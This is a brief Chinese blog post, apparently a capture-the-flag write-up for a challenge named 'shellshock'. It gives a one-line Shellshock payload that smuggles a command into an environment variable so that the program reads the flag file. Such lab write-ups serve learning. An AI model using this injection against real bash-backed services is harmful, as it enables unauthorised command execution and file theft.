shellshock

Posted by rk700 on November 18, 2014

好吧,从这名字就知道是怎么回事儿了,前端时间爆出来的shellshock漏洞。我们需要执行cat flag就行。不过我开始试cat会说找不到文件,于是用/bin/cat

$ env x='() { :;}; /bin/cat flag' ./shellshock